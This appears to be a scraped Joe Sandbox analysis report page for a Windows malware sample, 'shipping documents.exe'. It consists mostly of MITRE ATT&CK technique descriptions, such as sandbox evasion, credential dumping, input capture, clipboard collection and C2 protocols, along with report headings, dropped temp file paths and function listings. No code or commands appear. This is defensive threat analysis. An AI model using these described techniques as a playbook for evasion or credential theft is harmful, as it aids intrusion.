Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report shipping documents.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\23802I71

C:\Users\user\AppData\Local\Temp\autD919.tmp

C:\Users\user\AppData\Local\Temp\autD968.tmp

C:\Users\user\AppData\Local\Temp\nonplacental

C:\Users\user\AppData\Local\Temp\porcelainize

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Windows Analysis Report
shipping documents.exe

Function 00653B4C Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153
windowCOMMON

Function 00654FE9 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 62
COMMON

Function 00654AFE Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Function 006B93DF Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Function 00653015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73
windowregistryCOMMON

Function 00653041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Function 006571EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 00653633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151
windowtimeregistryCOMMON

Function 00653A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Function 00653778 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267
COMMON

Function 0065F8CF Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 168
comCOMMON

Function 03BA2610 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 006539E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre